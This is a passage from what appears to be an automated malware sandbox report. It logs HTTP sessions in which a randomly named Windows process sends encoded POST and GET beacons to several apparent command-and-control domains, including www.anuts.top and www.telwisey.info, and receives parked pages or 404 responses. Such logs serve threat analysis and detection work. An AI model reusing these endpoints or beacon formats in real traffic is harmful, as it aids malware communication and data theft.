                      Jul 2, 2024 07:16:44.148407936 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:19 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.5 | 49728 | 43.252.167.188 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:45.611141920 CEST | 530 | OUT | GET /rm91/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.xn--fhq1c541j0zr.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:46.464256048 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:22 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.5 | 49729 | 194.9.94.85 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:51.569314957 CEST | 799 | OUT | POST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2X/e1asZjcd2gP6BkmLwnsAu12T6R5SEHbGsHcEo=
                      Jul 2, 2024 07:16:52.215253115 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:52.215310097 CEST | 224 | IN
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                      Jul 2, 2024 07:16:52.215320110 CEST | 1236 | IN
                      Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                      Jul 2, 2024 07:16:52.215553999 CEST | 1236 | IN
                      Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                      Jul 2, 2024 07:16:52.215564966 CEST | 1236 | IN
                      Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                      Jul 2, 2024 07:16:52.215574026 CEST | 654 | IN
                      Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.5 | 49730 | 194.9.94.85 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:54.138571024 CEST | 819 | OUT | POST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gCNmAymoiluBl83CT9ITzkI19qLjuElpmG9fxyE
                      Jul 2, 2024 07:16:54.800302982 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:54.800349951 CEST | 1236 | IN
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:54.800360918 CEST | 448 | IN
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:54.800647020 CEST | 1236 | IN
                      Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                      Jul 2, 2024 07:16:54.800657034 CEST | 1236 | IN
                      Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                      Jul 2, 2024 07:16:54.801012993 CEST | 430 | IN
                      Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.5 | 49731 | 194.9.94.85 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:56.670464039 CEST | 1836 | OUT | POST /4hda/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--matfrmn-jxa4m.se
                      Origin: http://www.xn--matfrmn-jxa4m.se
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx= [TRUNCATED]
                      Jul 2, 2024 07:16:57.316021919 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:57.316099882 CEST | 1236 | IN
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:57.316111088 CEST | 1236 | IN
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:57.316479921 CEST | 1236 | IN
                      Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                      Jul 2, 2024 07:16:57.316494942 CEST | 878 | IN
                      Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.5 | 49732 | 194.9.94.85 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:59.203165054 CEST | 530 | OUT | GET /4hda/?66s0QHx=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.xn--matfrmn-jxa4m.se
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:59.856921911 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:16:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      X-Powered-By: PHP/8.1.24
                      Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                      Jul 2, 2024 07:16:59.857026100 CEST | 1236 | IN
                      Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                      Jul 2, 2024 07:16:59.857038021 CEST | 1236 | IN
                      Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                      Jul 2, 2024 07:16:59.857423067 CEST | 1236 | IN
                      Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                      Jul 2, 2024 07:16:59.857435942 CEST | 878 | IN
                      Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.5 | 49733 | 23.251.54.212 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:05.560895920 CEST | 766 | OUT | POST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3f0UaFictFtby9pxtQtHlbTx9corIkwEAkwgNfg=


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.5 | 49734 | 23.251.54.212 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:08.093244076 CEST | 786 | OUT | POST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27/JtPgcZURtaHgQTI1+4ZPNxWx2GsKRRpxWBn2r


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.5 | 49735 | 23.251.54.212 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:10.629173994 CEST | 1803 | OUT | POST /li0t/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.anuts.top
                      Origin: http://www.anuts.top
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.anuts.top/li0t/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.5 | 49736 | 23.251.54.212 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:13.175820112 CEST | 519 | OUT | GET /li0t/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.anuts.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.5 | 49737 | 199.192.19.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:39.655225992 CEST | 778 | OUT | POST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34uzX90l2lYo394/17bZLXf4WejM/5yDtl0YkiDU=
                      Jul 2, 2024 07:17:40.264354944 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:40 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.5 | 49738 | 199.192.19.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:42.185389042 CEST | 798 | OUT | POST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/UuOwEIoCiE/XIU8UDXDCuQ9jmUMFpDQAlTdL56
                      Jul 2, 2024 07:17:43.050575018 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:42 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.5 | 49739 | 199.192.19.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:44.716671944 CEST | 1815 | OUT | POST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:45.627377033 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:45 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.5 | 49740 | 199.192.19.19 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:17:47.253896952 CEST | 523 | OUT | GET /ei85/?66s0QHx=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.telwisey.info
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:47.960751057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:47 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html; charset=utf-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
